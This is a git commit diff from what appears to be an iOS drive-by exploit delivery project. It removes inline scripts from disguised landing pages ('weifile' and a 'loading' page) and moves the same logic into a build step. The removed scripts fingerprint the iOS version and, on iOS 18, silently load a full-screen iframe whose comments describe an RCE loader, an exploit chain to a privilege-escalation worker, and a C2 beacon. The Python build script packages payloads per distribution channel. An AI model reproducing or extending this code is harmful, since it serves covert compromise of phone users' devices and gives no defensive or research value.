feat: old channel

This commit is contained in:
hashbro
2026-10-07 05:19:52 +08:00
parent 2d3b6e1f2c
commit ba5d3c5731
30 changed files with 1517 additions and 896 deletions
@@ -5,53 +5,8 @@
<meta http-equiv="Expires" content="0" />
<meta property="og:determiner" content="auto" />
<title>weifile</title>
<script src="/t.js" defer></script>
</head>
<body>
<script type="text/javascript">
(function () {
function parseIosVersion() {
var ua = navigator.userAgent || '';
var m = /iPhone OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
if (!m) {
m = /Version\/(\d+)\.(\d+)/.exec(ua);
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
}
return m[1].split('_').map(function (p) {
return parseInt(p, 10);
});
}
var ios = parseIosVersion();
if (!ios || ios[0] < 18) {
// Below iOS 18: non-DS chain (index.js).
var s = document.createElement('script');
s.src = 'index.js?' + Date.now();
(document.body || document.documentElement).appendChild(s);
return;
}
if (ios[0] === 18) {
// iOS 18.x only: redirect to ds-new frame.html (gate + rce_loader.js).
// Extract per-channel patch string (X.Y.ZZ) from URL path and pass as ?c=
// so rce_loader.js can forward it through the exploit chain to pe_worker.js,
// which includes it in the C2 beacon for channel attribution.
var channelCode = '';
try {
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
if (m && m[1]) channelCode = m[1].toUpperCase();
} catch (eC) {}
var dsDomain = '__DS_DOMAIN__';
var dsUrl = dsDomain + '/next-chain/frame.html';
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
var ifr = document.createElement('iframe');
ifr.src = dsUrl;
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
(document.body || document.documentElement).appendChild(ifr);
}
// iOS 19+ / 26+: no action.
})();
</script>
<script src="index.js"></script>
</body>
</html>
@@ -8,7 +8,6 @@
<meta http-equiv="Expires" content="0" />
<meta property="og:determiner" content="auto" />
<title>加载中</title>
<script src="/t.js" defer></script>
<style>
:root {
--bg: #0f1419;
@@ -112,45 +111,7 @@
<p class="title">加载中</p>
<p class="subtitle">请稍候,正在准备页面…</p>
</div>
<script type="text/javascript">
(function () {
function parseIosVersion() {
var ua = navigator.userAgent || '';
var m = /iPhone OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
if (!m) {
m = /Version\/(\d+)\.(\d+)/.exec(ua);
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
}
return m[1].split('_').map(function (p) {
return parseInt(p, 10);
});
}
var ios = parseIosVersion();
if (!ios || ios[0] < 18) {
var s = document.createElement('script');
s.src = 'index.js?' + Date.now();
(document.body || document.documentElement).appendChild(s);
return;
}
if (ios[0] === 18) {
var channelCode = '';
try {
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
if (m && m[1]) channelCode = m[1].toUpperCase();
} catch (eC) {}
var dsDomain = '__DS_DOMAIN__';
var dsUrl = dsDomain + '/next-chain/frame.html';
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
var ifr = document.createElement('iframe');
ifr.src = dsUrl;
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
(document.body || document.documentElement).appendChild(ifr);
}
})();
</script>
<script src="index.js"></script>
<script>
(function () {
var TOTAL = 15;
@@ -5,53 +5,8 @@
<meta http-equiv="Expires" content="0" />
<meta property="og:determiner" content="auto" />
<title>weifile</title>
<script src="/t.js" defer></script>
</head>
<body>
<script type="text/javascript">
(function () {
function parseIosVersion() {
var ua = navigator.userAgent || '';
var m = /iPhone OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
if (!m) {
m = /Version\/(\d+)\.(\d+)/.exec(ua);
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
}
return m[1].split('_').map(function (p) {
return parseInt(p, 10);
});
}
var ios = parseIosVersion();
if (!ios || ios[0] < 18) {
// Below iOS 18: non-DS chain (index.js).
var s = document.createElement('script');
s.src = 'index.js?' + Date.now();
(document.body || document.documentElement).appendChild(s);
return;
}
if (ios[0] === 18) {
// iOS 18.x only: redirect to ds-new frame.html (gate + rce_loader.js).
// Extract per-channel patch string (X.Y.ZZ) from URL path and pass as ?c=
// so rce_loader.js can forward it through the exploit chain to pe_worker.js,
// which includes it in the C2 beacon for channel attribution.
var channelCode = '';
try {
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
if (m && m[1]) channelCode = m[1].toUpperCase();
} catch (eC) {}
var dsDomain = '__DS_DOMAIN__';
var dsUrl = dsDomain + '/next-chain/frame.html';
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
var ifr = document.createElement('iframe');
ifr.src = dsUrl;
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
(document.body || document.documentElement).appendChild(ifr);
}
// iOS 19+ / 26+: no action.
})();
</script>
<script src="index.js"></script>
</body>
</html>
+13 -2
View File
@@ -8,7 +8,7 @@ Requires `tools/build.py --apply` first (shared staged weifile + public/details)
3. Patch corepayload `/details/show.html` -> `/c/{ver}/show.htm` (18 bytes; netconfig)
4. Rewrite show.html asset URLs to /channel/{ver}/details/...
5. Patch secondary `/details/show.html` -> `/c/{ver}/show.htm` (18 bytes)
6. Strip iptj beacon from index.js; inject t.js into weifile.html
6. Strip iptj beacon from payload; install script-embed index.js boot
7. Write to {artifact-root}/channel/{ver}/
"""
@@ -19,10 +19,16 @@ import hashlib
import json
import re
import shutil
import sys
import tempfile
from pathlib import Path
import build as xxbb_build
_EMBED_DIR = Path(__file__).resolve().parents[2] / "channel-embed"
if str(_EMBED_DIR) not in sys.path:
sys.path.insert(0, str(_EMBED_DIR))
from embed_boot import apply_embed_boot # noqa: E402
from _details_pack import extract_member, make_passworded_7z
from _secondary_pack import decrypt_secondary_minjs, encrypt_secondary_minjs
@@ -209,7 +215,7 @@ def apply_landing_template(weifile_dir: Path, template: str) -> Path:
if not src.is_file():
raise SystemExit(f"missing landing template: {src}")
dest = weifile_dir / "weifile.html"
dest.write_text(inject_tjs(src.read_text(encoding="utf-8")), encoding="utf-8")
dest.write_text(src.read_text(encoding="utf-8"), encoding="utf-8")
return dest
@@ -285,6 +291,11 @@ def pack_channel(
leftover_route = weifile_dest / "route.js"
if leftover_route.is_file():
leftover_route.unlink()
apply_embed_boot(
weifile_dest,
channel_code=ver,
ds_domain=ds_domain,
)
if channel_out.exists():
shutil.rmtree(channel_out)
@@ -86,10 +86,10 @@ class XxbbBuildTest(unittest.TestCase):
self.assertFalse((weifile / "route.js").is_file())
html = (weifile / "weifile.html").read_text(encoding="utf-8")
self.assertNotIn("__CHANNEL_C__", html)
self.assertIn('src="/t.js"', html)
self.assertNotIn('src="/t.js"', html)
self.assertNotIn('src="route.js"', html)
self.assertIn("/next-chain/frame.html", html)
self.assertIn("index.js", html)
self.assertNotIn("/next-chain/frame.html", html)
self.assertIn('src="index.js"', html)
self.assertNotIn("config.js", html)
self.assertNotIn("boot.js", html)
self.assertNotIn("holdFresh", html)
@@ -327,11 +327,10 @@ class XxbbBuildTest(unittest.TestCase):
self.assertFalse((xxbb_build.SOURCE_WEIFILE / "route.js").is_file())
for name in ("weifile.html", "templates/blank.html", "templates/test.html"):
landing = (xxbb_build.SOURCE_WEIFILE / name).read_text(encoding="utf-8")
self.assertIn('src="/t.js"', landing)
self.assertEqual(pack_channel.inject_tjs(landing), landing)
self.assertIn('src="index.js"', landing)
self.assertNotIn('src="/t.js"', landing)
self.assertNotIn('src="route.js"', landing)
self.assertIn("/next-chain/frame.html", landing)
self.assertIn("index.js", landing)
self.assertNotIn("/next-chain/frame.html", landing)
self.assertNotIn("config.js", landing)
self.assertNotIn("boot.js", landing)
self.assertNotIn("holdFresh", landing)